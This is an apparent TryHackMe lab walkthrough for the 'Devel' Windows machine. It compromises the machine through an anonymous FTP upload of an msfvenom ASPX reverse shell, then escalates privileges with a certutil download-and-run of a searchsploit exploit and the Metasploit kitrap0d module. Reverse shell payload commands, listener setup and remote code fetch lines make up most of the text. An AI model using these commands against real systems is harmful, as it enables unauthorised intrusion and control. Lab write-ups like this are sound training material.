
TryHackMe Devel Walkthrough – Manual and Metasploit Methods
Devel is a beginner-friendly vulnerable machine that highlights risks caused by default configurations. It can be exploited using publicly available tools and basic enumeration.
Nmap Scan
We begin with a basic nmap
scan to discover open ports and services:
nmap -sC -sV -p- MACHINE_IP
From the results, we find two key open ports:
- 21 (FTP) – with anonymous login enabled
- 80 (HTTP) – hosting a web server
Step 1: Confirming FTP-HTTP Link
Visit the website on port 80 – a welcome image (welcome.png
) is displayed.
We notice that this file also appears in the FTP directory. This suggests the web server pulls files directly from the FTP root.
To confirm, upload a file (test.txt
) using anonymous FTP, then access it via the browser:
ftp MACHINE_IPput test.txt
Step 2: Web Tech Detection
Using Wappalyzer or similar tools, we identify the site runs Microsoft ASP.NET.
After quick research, we confirm .aspx
is the extension in use:
Method 1: Manual Exploitation (Netcat)
Generate a reverse shell payload using msfvenom
:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f aspx > rev.aspx
Upload the payload via FTP:
ftp MACHINE_IPput rev.aspx
Start a listener:
nc -lvnp 4444
Execute the payload via browser:
http://MACHINE_IP/rev.aspx
We receive a shell as a low-privileged user:
Privilege Escalation (Manual)
Run systeminfo
to gather system details:
systeminfo
Search for known exploits using OS version info:
Search: Windows 7 Enterprise build 7600 x86 exploit
Download with searchsploit
, serve via Python:
searchsploit -m exploit/windows/local/XXXXXXXXpython3 -m http.server 80
Download and run from victim using certutil
:
certutil -urlcache -f http://YOUR_IP/exploit.exe exploit.exeexploit.exe
Flags
Flag 1:
Flag 2:
Method 2: Automated Exploitation (Metasploit)
Generate a Meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f aspx > shell.aspx
Upload it to the server via FTP:
Set up Metasploit multi/handler:
use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST YOUR_IPset LPORT 4444run
Trigger the shell:
http://MACHINE_IP/shell.aspx
Get Meterpreter access:
Run post-exploitation module:
use post/multi/recon/local_exploit_suggesterset SESSION 1run
Exploit with ms10_015_kitrap0d
:
Final Flags
Flag 1:
Flag 2:
Conclusion
Devel demonstrates the risk of misconfigured services (FTP, ASP.NET) and how attackers can exploit them with simple privilege escalation techniques. Both manual and Metasploit methods highlight the same vulnerabilities but with different workflows.